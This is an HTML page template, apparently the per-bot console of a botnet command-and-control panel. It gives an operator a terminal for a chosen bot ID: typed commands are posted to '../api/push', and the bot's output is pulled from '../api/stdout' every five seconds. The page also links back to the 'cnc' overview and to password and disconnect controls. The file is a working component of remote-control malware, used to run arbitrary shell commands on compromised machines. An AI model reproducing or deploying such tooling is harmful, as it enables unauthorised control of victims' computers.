<!DOCTYPE html>
<html>
  <head>
    <meta charset='utf-8'>
    <meta http-equiv="X-UA-Compatible" content="chrome=1">

    <link rel="stylesheet" type="text/css" href="../static/css/stylesheet.css" media="screen">
    <link rel="stylesheet" type="text/css" href="../static/css/github-dark.css" media="screen">
    <title>{{botid}}</title>
  </head>

  <body>
    <header>
      <div class="container">
        <h1>{{botid}}</h1>
        <a href="../cnc">&lt;&lt; Back</a>
        <h2 style="text-align: right"><a href="../passchange">Change Password</a>  <a href="../disconnect">Disconnect</a></h2>
      </div>
    </header>

    <div class="container"> 
	<section id="main_content">
		
		<pre id="terminal" style="width:80%;"></pre>
		
		<input type="text" name="cmd" id="cmd" onkeypress="keypressed(event)" style="width: 50%" />
		<button type="submit" onclick="send_command()">Send</button>

        <br><br>

		<script src="https://code.jquery.com/jquery-2.1.4.min.js"></script>
		<script>
		function keypressed(e){
		    if(e.keyCode === 13){
			send_command();
		    }
		    return false;
		}
		function send_command(e) {
		    $.post("../api/push", {'botid': '{{botid}}', 'cmd': $('#cmd').val()});
		    $('#cmd').val('');
		    return false;
		}
		function refresh_term() {
		    $('#terminal').load("../api/stdout?botid={{botid}}");
            if (!$('#terminal').is(':hover')) {
               termdiv = document.getElementById('terminal');
               termdiv.scrollTop = termdiv.scrollHeight;
            }
            
		}
		setInterval(refresh_term, 5000)
		$(document).ready(function(){
		    refresh_term();
		});

		</script>

	</section>
    </div>
  
  </body>
</html>
